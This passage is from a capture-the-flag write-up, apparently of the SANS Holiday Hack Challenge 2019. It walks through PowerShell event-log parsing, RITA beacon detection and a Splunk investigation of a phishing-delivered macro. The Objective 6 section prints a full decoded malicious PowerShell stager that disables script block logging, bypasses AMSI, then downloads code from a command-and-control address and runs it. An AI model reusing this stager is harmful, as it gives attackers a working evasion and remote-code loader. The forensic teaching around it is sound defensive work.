    26.93     0.75       6 root                           CheerLaserServi
   116.98     1.87      31 elf                            elf
     3.55     0.03       1 root                           init
     0.80     0.00      23 bushy                          sleep
     0.82     0.00      26 alabaster                      sleep
     0.71     0.00      27 minty                          sleep
     0.86     0.00      29 holly                          sleep
     3.49     0.00      30 root                           su
PS /home/elf> <span>Stop-Process -Id 23</span>
PS /home/elf> <span>Stop-Process -Id 26</span>
PS /home/elf> <span>Stop-Process -Id 27</span>
PS /home/elf> <span>Stop-Process -Id 29</span>
PS /home/elf> <span>gci /shall</span>
      Directory: /shall
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    --r---            1/9/20 10:33 PM            149 see
PS /home/elf> <span>gc /shall/see</span>
    Get the <mark>.xml children of /etc</mark> - an <mark>event log</mark> to be found. Group all .Id's 
    and the last thing will be in the <mark>Properties</mark> of the lonely <mark>unique event Id</mark>.</pre>
  <p>
    Oh goodie, another riddle! The <b>event log</b> is found by recursively
    listing all elements in /etc with suffix .xml. Only a single file is found,
    but that is large and ugly. XML operations is where PowerShell really 
    shines. After packing the file into a single variable and casting to XML,
    the structure can be navigated elegantly (supposedly).
  </p>
  <pre>
PS /home/elf> <span>gci /etc -recurse -include *.xml</span>
     
        Directory: /etc/systemd/system/timers.target.wants
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    --r---          11/18/19  7:53 PM       10006962 EventLog.xml
PS /home/elf> <span><mark>[xml]$ev</mark> = gc /etc/systemd/system/timers.target.wants/EventLog.xml</span>
PS /home/elf> <span>$ev</span>                                     
    Objs
    ----
    Objs
PS /home/elf> <span>$ev.Objs</span>          
    Version xmlns                                           Obj
    ------- -----                                           ---
    1.1.0.1 http://schemas.microsoft.com/powershell/2004/04 {Obj, Obj, Obj, Obj…}
PS /home/elf> <span>$ev.Objs.Obj.Count</span>
    1224</pre>
  <p>
    The EventLog is structured as an array of 1224 <b>Obj</b> event objects under a root <b>Objs</b>.
    Each of these event objects has a huge InnerXml structure, which may vary between events. 
    As an example, the first two levels of the first event are
  </p> 
  <pre class="prettyprint lang-xml">
&lt;Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"&gt;
  &lt;Obj RefId="0"&gt;
    &lt;TN RefId="0"&gt;
      &lt;T&gt;System.Diagnostics.Eventing.Reader.EventLogRecord&lt;/T&gt;
      &lt;T&gt;System.Diagnostics.Eventing.Reader.EventRecord&lt;/T&gt;
      &lt;T&gt;System.Object&lt;/T&gt;
    &lt;/TN&gt;
    &lt;ToString&gt;System.Diagnostics.Eventing.Reader.EventLogRecord&lt;/ToString&gt;
    &lt;Props&gt;
      <mark>&lt;I32 N="Id"&gt;3&lt;/I32&gt;</mark>
      &lt;By N="Version"&gt;5&lt;/By&gt;
      &lt;Nil N="Qualifiers" /&gt;
      &lt;By N="Level"&gt;4&lt;/By&gt;
      &lt;I32 N="Task"&gt;3&lt;/I32&gt;
      &lt;I16 N="Opcode"&gt;0&lt;/I16&gt;
      &lt;I64 N="Keywords"&gt;-9223372036854775808&lt;/I64&gt;
      &lt;I64 N="RecordId"&gt;2194&lt;/I64&gt;
      &lt;S N="ProviderName"&gt;Microsoft-Windows-Sysmon&lt;/S&gt;
      &lt;G N="ProviderId"&gt;5770385f-c22a-43e0-bf4c-06f5698ffbd9&lt;/G&gt;
      &lt;S N="LogName"&gt;Microsoft-Windows-Sysmon/Operational&lt;/S&gt;
      &lt;I32 N="ProcessId"&gt;1960&lt;/I32&gt;
      &lt;I32 N="ThreadId"&gt;6648&lt;/I32&gt;
      &lt;S N="MachineName"&gt;elfuresearch&lt;/S&gt;
      &lt;Obj N="UserId" RefId="1"&gt;
        ...
      &lt;/Obj&gt;
      &lt;DT N="TimeCreated"&gt;2019-11-07T09:51:22.6559745-08:00&lt;/DT&gt;
      &lt;Nil N="ActivityId" /&gt;
      &lt;Nil N="RelatedActivityId" /&gt;
      &lt;S N="ContainerLog"&gt;microsoft-windows-sysmon/operational&lt;/S&gt;
      &lt;Obj N="MatchedQueryIds" RefId="2"&gt;
        ...
      &lt;/Obj&gt;
      &lt;Obj N="Bookmark" RefId="3"&gt;
        ...
      &lt;/Obj&gt;
      &lt;S N="LevelDisplayName"&gt;Information&lt;/S&gt;
      &lt;S N="OpcodeDisplayName"&gt;Info&lt;/S&gt;
      &lt;S N="TaskDisplayName"&gt;Network connection detected (rule: NetworkConnect)&lt;/S&gt;
      &lt;Obj N="KeywordsDisplayNames" RefId="4"&gt;
        ...
      &lt;/Obj&gt;
      <mark>&lt;Obj N="Properties" RefId="5"&gt;</mark>
        ...
      &lt;/Obj&gt;
    &lt;/Props&gt;
    &lt;MS&gt;
      &lt;S N="Message"&gt;Network connection detected:...[snip]...DestinationPortName: ntp&lt;/S&gt;
    &lt;/MS&gt;
  &lt;/Obj&gt;  
  ...
&lt;/Objs&gt;</pre> 
  <p>
    According to the hint, the events should be grouped by <b>event ID</b>, which is
    located in <code>$ev.Objs.Obj.Props</code> under the tag <code>&lt;I32 N="Id"&gt;</code>.
    So, we select all I32 children with attribute N="Id", and group by element value.
    The only unique event ID turns out to be 1. To get the associated event properties,
    I selected the event ID tag, moved to the parent node and assigned the child Obj 
    with N="Properties" to a new variable.
  </p>
  <pre>
PS /home/elf> <span>$ev.Objs.Obj.Props.I32 | ? N -eq "Id" | group "#text"</span>
    Count Name                      Group
    ----- ----                      -----
        <mark>1 1                         {I32}</mark>
       39 2                         {I32, I32, I32, I32…}
      179 3                         {I32, I32, I32, I32…}
        2 4                         {I32, I32}
      905 5                         {I32, I32, I32, I32…}
       98 6                         {I32, I32, I32, I32…}
PS /home/elf> <span><mark>$unique</mark> = ($ev.objs.Obj.Props.I32 | ? N -eq "Id" | ? "#text" -eq 1).ParentNode.Obj |? N -eq "Properties"</span></pre>
  <p>
    The event properties are essentially a list of 22 objects with different RefId. 
    I was not able to find a way to prettyprint this within the terminal, so I 
    extracted <code>$unique.InnerXml</code> and sent it to an online service. 
    The object with RefId="1806" turns out to be the one:
  </p>
  <pre class="prettyprint" lang-xml>
&lt;Obj RefId="18016"&gt;
    &lt;TNRef RefId="1806" /&gt;
    &lt;ToString&gt;
        System.Diagnostics.Eventing.Reader.EventProperty
    &lt;/ToString&gt;
    &lt;Props&gt;
        &lt;S N="Value"&gt;
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c 
            "`<mark>$correct_gases_postbody</mark> = @{`n    O=6`n    H=7`n    He=3`n    
              N=4`n    Ne=22`n    Ar=11`n    Xe=10`n    F=20`n    Kr=8`n    Rn=9`n}`n"
        &lt;/S&gt;
    &lt;/Props&gt;
&lt;/Obj&gt;</pre>
  <div class="note"> A more direct approach would be to use Select-String to 
    extract all 32 bit integer field with name Id from the logs, and then to group them in order 
    to find out how many of each type there are. This outputs a table similar to the one above. 
    Once the correct Id is found, Select-String with the Context argument can be used to examine 
    the entire event (guessing 10 lines before to 200 lines after the match). The gas mixture can 
    be found simply by inspection.
    <pre>
PS /home/elf> <span>Select-String -Path ./EventLog.xml -Pattern '&lt;I32 n="Id"&gt;' | Group-Object -Property Line</span>    
PS /home/elf> <span>Select-String -Path ./EventLog.xml -Pattern '&lt;I32 n="Id"&gt;1&lt;/I32&gt' -Context 10,200</span> </pre>
  </div>

  <P>The laser settings are now finally complete:</P>
  <table class="bordered">
    <tr><td>temperature:</td><td>-33.5</td></tr>
    <tr><td>angle:</td><td>65.5</td></tr>
    <tr><td>refraction:</td><td>1.867</td></tr>
    <tr><td>gases:</td><td>O=6, H=7, He=3, N=4, Ne=22, Ar=11, Xe=10, F=20, Kr=8, Rn=9</td></tr>
  </table>
  <p>
    The final step is to write them to the laser API, which is described 
    under the link given on the introduction screen: 
    <code>(Invoke-WebRequest -Uri http://localhost:1225/).RawContent</code>
    The following sequence of WebRequests worked for me:
  </p>
  <pre>
    $gases = @{O=6; H=7; He=3; N=4; Ne=22; Ar=11; Xe=10; F=20; Kr=8; Rn=9}
    Invoke-WebRequest -Uri http://localhost:1225/api/off
    Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867
    Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5
    Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5
    Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $gases
    Invoke-WebRequest -Uri http://localhost:1225/api/on
    (Invoke-WebRequest -Uri http://localhost:1225/api/output).<mark>RawContent</mark></pre>
  <img src="img/obj_05/success.png" class="centered">
  <p>
    There was a very nasty pitfall / bug at this point which cost me several days: 
    The success message also comes up in the API if the final WebRequest is sent 
    without the RawContent property. But for no apparent reason, Sparkle Redberry 
    does not take note, the achievement does not register and no further hints are forthcoming. 
    All the RawContent property does is include the HTTP header information in the 
    response, but it turns out to be essential in the output WebRequest. The only 
    hint to use RawContent appeared in the history list right in the beginning, where
    the angle parameter was found. 
  </p>

  <div class="quote">
    <div class="name">Sparkle Redberry:</div>
    You got it - three cheers for cheer!<br>
    For objective 5, have you taken a look at our Zeek logs?
    Something's gone wrong. <br>But I hear someone named Rita can help us.
    Can you and she figure out what happened?        
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://www.activecountermeasures.com/free-tools/rita/">RITA</a>
  </div>

 <h3 id="obj05_2">II) Windows Log Analysis - Determine Compromised System</h3>
 <p>
    <a href="https://en.wikipedia.org/wiki/Zeek">Zeek</a> is a network analysis framework 
    which generates events when "something happens". We are given a folder with 900 logs
    on diverse network topics, most of them large and detailled. A full list of log types can 
    be found <a href="https://docs.zeek.org/en/stable/script-reference/log-files.html">here</a>.
    To analyse all this, the previous hint by Sparkle Redberry indicated RITA, an 
    open-source framework for network traffic analysis. Luckily, the RITA analysis has 
    already been done by friendly elves and been placed in the Zeek log folder, saving me 
    the hassle of installing RITA. The 
    <a href="https://www.activecountermeasures.com/free-tools/rita/">homepage</a>
    contains several videos explaining how to use the analysis.
  </p>
  <img src="img/obj_05/rita_beacons.png" width="100%">
  <p>
    We are looking for a beacon, i.e. a system opening outside connections very frequently.
    Looking at the <b>Beacons</b> tab of the RITA analysis, one connection path stands out, 
    being used very frequently, with 7660 connections and a very high "beacon score" of 99.8%.
    The source IP address <b>192.168.134.130</b> belongs to the malware infected system, and 
    the destination address <b>144.202.46.214</b> will be its command and control server.
    The same address reappears in the Splunk analysis in Objective 6. 
  </p>
  <p><div class="note"> RITA actually shows much more. For example, "long connections" 
    identifies the same IP address for an abnormally long connection (16.5 minutes), more than 
    double the next longest, which is suspicious. Also, the User Agents field shows a single 
    instance of WicaAgent, which is an unusual UA and apeears to be often connected to malware 
    (according to google).
  </div></p>
  <div class="answer"><b>Answer</b>: 192.168.134.130</div>

  <h2 id="obj06">Objective 6: Splunk</h2>
  <div class="objective">
    Difficulty:3<br>
    Access <a href="https://splunk.elfu.org/">https://splunk.elfu.org/</a> 
    as elf with password elfsocks. What was the message for Kent that 
    the adversary embedded in this attack? The SOC folks at that link 
    will help you along! 
    <em>
      For hints on achieving this objective, 
      please visit the Laboratory in Hermey Hall and talk with Prof. Banas.
    </em>
  </div>
  <p></p>
  <div class="quote">
    <div class="name">Prof. Banas:</div>
    <div>
      Hi, I'm Dr. Banas, professor of Cheerology at Elf University.<br>
      This term, I'm teaching "HOL 404: The Search for Holiday Cheer in Popular Culture," 
      and I've had quite a shock! I was at home enjoying a nice cup of Gløgg when I had 
      a call from Kent, one of my students who interns at the Elf U SOC.
      Kent said that my computer has been hacking other computers on campus and 
      that I needed to fix it ASAP! If I don't, he will have to report the incident 
      to the boss of the SOC.<br>
      Apparently, I can find out more information from this website 
      <a href="https://splunk.elfu.org/">https://splunk.elfu.org/</a> with 
      the username: elf / Password: elfsocks.
      I don't know anything about computer security. Can you please help me?
    </div>
  </div>
  <p></p>
  <img src="img/obj_06/welcome.png" class="centered">
  <p>
    This challenge was a totally new experience and a massive surprise to me. 
    I didn't have any previous experience with blue team work, and the 
    idea of spelunking through haystacks of logs always sounded like
    a pleasure second only to dentistry a la Marathon Man (which is strangely
    appropriate, given the identity of the supervillain this year). I stand 
    corrected! This guided tour made an otherwise impossible (to me at least) 
    challenge quite easy, and a great learning experience which also helped 
    in log crawls to follow. Kudos! Lets start ...
  </p>
  <img src="img/obj_06/intro.png" width="100%">
  <p>
    Two major resources are introduced first, the 
    <a href="https://splunk.elfu.org/de-DE/app/SA-elfusoc/search">search page</a>
    which forms the centerpiece of Splunk, and the 
    <a href="http://elfu-soc.s3-website-us-east-1.amazonaws.com/">file archives</a>
    to be searched. For each of the seven training questions, a chat window 
    discusses the issue and guides through the basic techniques required 
    to solve it. 
  </p>
  <h4>
    Question 1:<br> <em>What is the short host name of Professor Banas' computer?</em>
  </h4>
  <p>
    Looking up the #ELFU SOC chatroom gives the first answer 
    as a welcome present:<br>&rarr; sweetums
  </p>

  <h4>
    Question 2:<br> <em>What is the name of the sensitive file that was 
    likely accessed and copied by the attacker?<br> Please provide the fully 
    qualified location of the file. (Example: C:\temp\report.pdf)</em>
  </h4>
  <p>
    It is pointed out that Prof. Banas is the ideal target for an attack:
    close to "the big guy", and clueless regarding security. So, if anything
    sensitive has gome missing, it probably has something to do with Santa.
    Searching for <b>"santa"</b> leads to 11 logged events. Ten of them are 
    caused by PowerShell commands with huge, base64 encoded command lines.
    One decoded example:
  </p>
  <pre>
    IF($PSVerSioNTaBLe.PSVERsIOn.MAJor -gE 3){
      $GPF=[Ref].ASsEMBly.GETTyPE('System.Management.Automation.Utils')."GEtFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
      IF($GPF){
        $GPC=$GPF.GeTVAluE($nUlL);
        If($GPC['ScriptB'+'lockLogging']){
          $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
          $GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
        }$val=[COLlEcTioNs.GEneRiC.DICTIoNAry[StrING,SySTEm.ObjecT]]::NeW();
        $vAl.AdD('EnableScriptB'+'lockLogging',0);
        $vaL.ADd('EnableScriptBlockInvocationLogging',0);
        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl
      }ElSE{
        [SCrIPTBlOCK]."GEtFIe`lD"('signatures','N'+'onPublic,Static').SETVALUe($NUll,(NEW-OBjEct CollEcTions.GEnerIC.HashSeT[sTrING]))
      }[REf].ASSEMBlY.GETTYPe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GETFielD('amsiInitFailed','NonPublic,Static').SEtValUe($NUlL,$True)};
    };[SySteM.NeT.SERvicEPoInTMaNaGer]::EXPecT100CONtInUe=0;
    $wc=NEw-ObjECT SysTEM.NeT.WeBCLiENT;
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
    $wC.HEADErS.ADd('User-Agent',$u);
    $Wc.ProXy=[SySTeM.Net.WeBREQuEST]::DEFaULTWebProXy;
    $WC.PRoXy.CREDenTIAls = [SySTEm.NET.CRedeNTiAlCAcHe]::DeFaulTNeTwORkCREDenTiALS;
    $Script:Proxy = $wc.Proxy;
    $K=[SySTEM.Text.EncOdING]::ASCII.GeTBYteS('zd!Pmw3J/qnuWoHX~=g.{>p,GE]:|#MR');
    $R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};
    $ser='http://144.202.46.214:8080';
    $t='/admin/get.php';
    $WC.HEADErs.Add("Cookie","session=reT9XQAl0EMJnxukEZy/7MS70X4=");
    $DATa=$WC.DownlOADDAtA($sEr+$T);$Iv=$DatA[0..3];
    $DatA=$dATa[4..$DatA.lENGtH];
    -JOIN[ChaR[]](& $R $DatA ($IV+$K))|IEX</pre>
  <p>
    Clearly someone is messing around. The command lines are pretty impenetrable,
    but the event information shows what was actually done. The contents (8 files) 
    of C:\Users\cbanas were searched for appearance of the keyword 'Santa'
    <br>&rarr; C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt
  </p>
  <p><div class="note"> The powershell code generates HTTP requests, 
    downloads the response and then executes it using the IEX commandlet. This is 
    the attackers command and control channel to prof. Banas' machine.
  </div></p>
  <pre>
    Message=CommandInvocation(Get-ChildItem): "Get-ChildItem"
    ParameterBinding(Get-ChildItem): name="Recurse"; value="True"
    ParameterBinding(Get-ChildItem): name="Path"; value="C:\Users\cbanas"
    ParameterBinding(Get-ChildItem): name="File"; value="True"
    CommandInvocation(ForEach-Object): "ForEach-Object"
    ParameterBinding(ForEach-Object): name="Process"; value="Select-String -path $_ -pattern Santa"
    ParameterBinding(ForEach-Object): name="InputObject"; value="Microsoft Edge.lnk"
    ParameterBinding(ForEach-Object): name="InputObject"; value="Naughty_and_Nice_2019_draft.txt"
    ParameterBinding(ForEach-Object): name="InputObject"; value="19th Century Holiday Cheer Assignment.doc"
    ParameterBinding(ForEach-Object): name="InputObject"; value="assignment.zip"
    ParameterBinding(ForEach-Object): name="InputObject"; value="Bing.url"
    ParameterBinding(ForEach-Object): name="InputObject"; value="Desktop.lnk"
    ParameterBinding(ForEach-Object): name="InputObject"; value="Downloads.lnk"
    ParameterBinding(ForEach-Object): name="InputObject"; value="winrt--{S-1-5-21-1217370868-2414566453-2573080502-1004}-.searchconnector-ms"</pre>
  <p>
    The search was successful in one instance, which led to the most recent (top) event
    in the results list:
  </p>
  <pre>
    ParameterBinding(Format-List): name="InputObject"; value="<mark>C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt</mark>:1:
      Carl, you know there's no one I trust more than you to help.  Can you have a look 
      at this draft Naughty and Nice list for 2019 and let me know your thoughts? -Santa"</pre>
  <p>
    The first event in the set is of a different type, with a deeply nested 
    JSON structure (a stoQ event, as becomes clearer later). It shows 
    evidence of the extraction of different XML components of a Microsoft 
    Word document. Anyway, the answer is
    <br>&rarr; C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt
  </p>

  <h4>
    Question 3:<br> <em>What is the fully-qualified domain name(FQDN) 
    of the command and control(C2) server? (Example: badguy.baddies.com)</em>
  </h4>
  <p>
    The next task introduces Sysmon logs which can be searched for outside
    interactions. PowerShell was used to remote control the system, so the 
    search term should include powershell and the event code 3 for network 
    connections: <br>
    &rarr; <code>index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational powershell EventCode=3</code><br>
    This narrows down the results to 159 events. Marking <b>DestinationHostname</b>
    in the list of interesting fields shows that pretty much all those connections 
    go to the same place. This will be the C2 server which has enslaved poor sweetums.
    <br>&rarr; 144.202.46.214.vultr.com
  </p>
  <p>
    <div class="note"> vultr.com is a hosting company offering virtual private service. </div>
  </p>

  <h4>
    Question 4:<br> <em>What document is involved with launching the malicious 
    PowerShell code? Please provide just the filename. (Example: results.txt)</em>
  </h4>
  <div class="terminal">
    <img src="img/obj_06/q4_process_id.png">
  </div>
  <p>
    The first step is to look for PowerShell events and to find out when 
    all this activity started: <br>
    &rarr; <code>index=main sourcetype="WinEventLog:Microsoft-Windows-<mark>Powershell</mark>/Operational" | reverse</code><br>
    The first event is timestamped 08/25/2019 09:18:37 AM. So lets find out what happened 
    in a +- 5 second interval around this time by looking for nearby events (called pivoting on time). 
    40 events of all descriptions are returned. The events of interest are Sysmon events. Restricting 
    the search to them leaves 12 events, and they are all linked to two process IDs. <br>
    &rarr; <code>index=main sourcetype="XmlWinEventLog:Microsoft-Windows-<mark>Sysmon</mark>/Operational"</code>
  </p>
  <p>
    To find out how these processes were started, we are told to look for 
    Windows Process Execution events (Event ID 4688) linked to those two
    process IDs, 5864 = 0x16e8 and 6268 = 0x187c. The second one holds the 
    answer.
  </p>
  <pre>
&rarr; index=main sourcetype=WinEventLog EventCode=4688 <mark>New_Process_ID=0x16e8</mark>
    New Process ID:         0x16e8
    New Process Name:       C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Token Elevation Type:   %%1938
    Mandatory Label:        Mandatory Label\Medium Mandatory Level
    Creator Process ID:     0xc10
    Creator Process Name:   C:\Windows\System32\wbem\WmiPrvSE.exe
    Process Command Line:   powershell -noP -sta -w 1 -enc  &lt;long nasty base64&gt;

&rarr; index=main sourcetype=WinEventLog EventCode=4688 <mark>New_Process_ID=0x187c</mark>
    New Process ID:         0x187c
    New Process Name:       C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    Token Elevation Type:   %%1938
    Mandatory Label:        Mandatory Label\Medium Mandatory Level
    Creator Process ID:     0x1748
    Creator Process Name:   C:\Windows\explorer.exe
    Process Command Line:   "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n 
                            "C:\Windows\Temp\Temp1_Buttercups_HOL404_assignment (002).zip\19th Century Holiday Cheer Assignment.docm"</pre>
  
  <p>
    <div class="note"> The parent process, WmiPrvSE.exe, which is the Windows
    Management Interface (WMI). Immediately preceding this is a Sysmon type 7 event, an image 
    load from winword.exe which flags a "suspicious WMI module load". So, the word document 
    which started the attack was most likely macro enabled and used the WMI call to 
    launch PowerShell. </div>
  </p>                          
  <p>&rarr; 19th Century Holiday Cheer Assignment.docm</p>

  <h4>
    Question 5:<br> <em>How many unique email addresses were used to send 
    Holiday Cheer essays to Professor Banas? Please provide the numeric 
    value. (Example: 1)</em>
  </h4>
  <p>
    Apparently, ELFU uses the stoQ automation framework to analyze all emails 
    in and out of the university. Its logs can be searched with 
    <code>sourcetype=stoq</code>, finding 42 mails from and to Prof. Banas. 
    The direct JSON output is pretty hard to digest, so the output should be 
    filtered to a table to visualize the interesting fields.<br>
    We are interested in all email to Prof. Banas with the exact 
    subject 'Holiday Cheer Assignment Submission'
  </p>
  <pre>
index=main sourcetype=stoq 
      "results{}.workers.smtp.from"!="Carl Banas &lt;Carl.Banas@faculty.elfu.org&gt;" 
      "results{}.workers.smtp.subject"="holiday cheer assignment submission"
      | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body 
      | sort - _time
  </pre>
  <p>
    21 mails are returned. It would be nice to group them by their lowercase source 
    (results{}.workers.smtp.from) so that email addresses do not occur twice, but I 
    wasn't able to find a filter to do this. So I simply sorted by results{}.workers.smtp.from
    and checked by hand. All 21 addresses are distinct, so this gives the answer.
    <br>&rarr; 21
  </p>

  <h4>
    Question 6:<br> <em>What was the password for the zip archive that 
    contained the suspicious file?</em>
  </h4>
  <p>
    The last two training questions are answered by the very suspicious looking
    email from Bradly Buttercup, asking to extract a Word Document from a password
    protected ZIP file (to try to bypass automated scanning) and to enable 
    active content. "I hope you like it" indeed!
  </p>
  <img src="img/obj_06/q6_q7_bradley.png" width="100%">
  <p>
    <br>&rarr; 123456789
  </p>

  <h4>
    Question 7:<br> <em>What email address did the suspicious file come from?</em>
  </h4>
  <p>
    &rarr; bradly.buttercups@eifu.org
  </p>
  <p><div class="note"> This is a common trick: "eifu.org" looks very similar to "elfu.org", 
    which would have been a legitimate address.
  </div></p>

  <h4>
    Challenge Question:<br> <em>What was the message for Kent that the 
    adversary embedded in this attack?</em>
  </h4>
  <p>
    The stoQ log of the evil mail identified above only shows the metadata,
    but also contains references to actual data which is located in the archive.
    The raw JSON request log can be loaded with <br>
    &rarr; <code>index=main sourcetype=stoq "results{}.workers.smtp.from"="Bradly Buttercups 
      &lt;Bradly.Buttercups@eIfu.org&gt;"</code><br>
    The different data components are separated out into 30 <b>results</b>, and 
    the interesting data is placed in 
  </p>
  <table class="bordered">
    <tr><td>Name of file</td><td>results{}.payload_meta.extra_data.filename</td></tr>
    <tr><td>Archive location</td><td>results{}.archivers.filedir.path</td></tr>
  </table>
  <p>
    Going through these results items one by oen would be extremely boring. Filters
    can be used to delve down and extract the desired data in tabular form. The following
    sequence of filters following the above search does the required magic:
  </p>
  <ol>
    <li><code>| eval results = spath(_raw, "results{}"):</code> assign the elements of the 
      results{} array to the multivalue variable results</li>
    <li><code>| mvexpand results:</code> expand the multiple values of results into 
      separate events</li>
    <li><code>| eval path=spath(results, "archivers.filedir.path"), filename=spath(results, 
      "payload_meta.extra_data.filename"), fullpath=path."/".filename:</code> assign filename, 
      archive path and full path to separate variables </li>
    <li><code>| search fullpath!="filename": </code> get rid of entries without file reference</li>
    <li><code>| table filename,fullpath:</code> show file name and full archive paths as table</li>
  </ol>
  <table class="bordered">
    <tr><td>1574356658.Vca01I45e44M667617.ip-172-31-47-72</td><td>/home/ubuntu/archive/7/f/6/3/a/7f63ace9873ce7326199e464adfdaad76a4c4e16/1574356658.Vca01I45e44M667617.ip-172-31-47-72</td></tr>
    <tr><td>Buttercups_HOL404_assignment.zip</td><td>/home/ubuntu/archive/9/b/b/3/d/9bb3d1b233ee039315fd36527e0b565e7d4b778f/Buttercups_HOL404_assignment.zip</td></tr>
    <tr><td><mark>19th Century Holiday Cheer Assignment.docm</mark></td><td>/home/ubuntu/archive/c/6/e/1/7/c6e175f5b8048c771b3a3fac5f3295d2032524af/19th Century Holiday Cheer Assignment.docm</td></tr>
    <tr><td>[Content_Types].xml</td><td>/home/ubuntu/archive/b/e/7/b/9/be7b9b92a7acd38d39e86f56e89ef189f9d8ac2d/[Content_Types].xml</td></tr>
    <tr><td> document.xml</td><td>/home/ubuntu/archive/1/e/a/4/4/1ea44e753bd217e0edae781e8b5b5c39577c582f/document.xml</td></tr>
    <tr><td>styles.xml</td><td>/home/ubuntu/archive/e/e/b/4/0/eeb40799bae524d10d8df2d65e5174980c7a9a91/styles.xml</td></tr>
    <tr><td>settings.xml</td><td>/home/ubuntu/archive/1/8/f/3/3/18f3376a0ce18b348c6d0a4ba9ec35cde2cab300/settings.xml</td></tr>
    <tr><td>vbaData.xml</td><td>/home/ubuntu/archive/f/2/a/8/0/f2a801de2e254e15840460f4a53e568f6622c48b/vbaData.xml</td></tr>
    <tr><td>fontTable.xml</td><td>/home/ubuntu/archive/1/0/7/4/0/1074061aa9d9649d294494bb0ae40217b9c7a2d9/fontTable.xml</td></tr>
    <tr><td>webSettings.xml</td><td>/home/ubuntu/archive/8/6/c/4/d/86c4d8a2f37c6b4709273561700640a6566491b1/webSettings.xml</td></tr>
    <tr><td>vbaProject.bin</td><td> ...&lt; VBA not stored, actual malware &gt;... </td></tr>
    <tr><td>document.xml.rels</td><td>/home/ubuntu/archive/a/2/b/b/1/a2bb14afe8161ee9bd4a6ea10ef5a9281e42cd09/document.xml.rels /td></tr>
    <tr><td>vbaProject.bin.rels</td><td>/home/ubuntu/archive/4/0/d/c/1/40dc1e00e2663cb33f8c296cdb0cd52fa07a87b6/vbaProject.bin.rels </td></tr>
    <tr><td>theme1.xml</td><td>/home/ubuntu/archive/f/5/c/b/a/f5cba8a650d6ada98d170f1b22098d93b8ff8879/theme1.xml </td></tr>
    <tr><td>item1.xml</td><td>/home/ubuntu/archive/0/2/b/6/7/02b67cad55d2684115a7de04d0458a3af46b12c6/item1.xml </td></tr>
    <tr><td>itemProps1.xml</td><td>/home/ubuntu/archive/1/7/6/1/2/1761214092f5c0e375ab3bc58a8687134b7f2582/itemProps1.xml </td></tr>
    <tr><td>item1.xml.rels</td><td>/home/ubuntu/archive/b/7/7/0/f/b770f3a79423882bdae4240e995c0885770022ef/item1.xml.rels </td></tr>
    <tr><td>.rels</td><td>/home/ubuntu/archive/9/d/7/a/b/9d7abf0ee4effcecad80c8bbfb276079a05b4342/.rels </td></tr> 
    <tr><td>app.xml</td><td>/home/ubuntu/archive/e/9/2/1/1/e9211c706be234c20d3c02123d85fea50ae638fd/app.xml </td></tr>
    <tr><td><mark>core.xml</mark></td><td>/home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4/core.xml </td></tr>
  </table>
  <p>
    We can access the complete document or its individual (XML) components. 
    Following an archive link leads to a download of the stored data.
  </p>
  <table class="bordered">
    <tr>
      <td>19th Century Holiday Cheer Assignment.docm</td>
      <td>
        Cleaned for your safety. Happy Holidays!
        In the real world, This would have been a wonderful artifact for you to investigate, 
        but it had malware in it of course so it's not posted here. Fear not! 
        The core.xml file that was a component of this original macro-enabled Word doc 
        is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-)
      </td>
    </tr>
    <tr>
      <td>core.xml</td>
      <td>
        &lt;cp:coreProperties&gt;
            &lt;dc:title&gt;Holiday Cheer Assignment&lt;/dc:title&gt;
            &lt;dc:subject&gt;19th Century Cheer&lt;/dc:subject&gt;
            &lt;dc:creator&gt;Bradly Buttercups&lt;/dc:creator&gt;
            &lt;cp:keywords/&gt;
            &lt;dc:description&gt;
                <mark>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.</mark>
            &lt;/dc:description&gt;
            &lt;cp:lastModifiedBy&gt;Tim Edwards&lt;/cp:lastModifiedBy&gt;
            &lt;cp:revision&gt;4&lt;/cp:revision&gt;
            &lt;dcterms:created xsi:type="dcterms:W3CDTF"&gt;2019-11-19T14:54:00Z&lt;/dcterms:created&gt;
            &lt;dcterms:modified xsi:type="dcterms:W3CDTF"&gt;2019-11-19T17:50:00Z&lt;/dcterms:modified&gt;&lt;cp:category/&gt;
        &lt;/cp:coreProperties&gt;
      </td>
    </tr>
  </table>
  <p><div class="answer"><b>Answer</b>: Kent you are so unfair. And we were going to make you the 
    king of the Winter Carnival.</div></p>
 
  <img src="img/obj_06/success.png" width="100%">


  <h2 id="obj07">Objective 7: Get Access To The Steam Tunnels</h2>
  <div class="objective">
    Difficulty:3<br>
    Gain access to the steam tunnels.  Who took the turtle doves? 
    Please tell us their first and last name. 
    <em>
      For hints on achieving this objective, please visit Minty's 
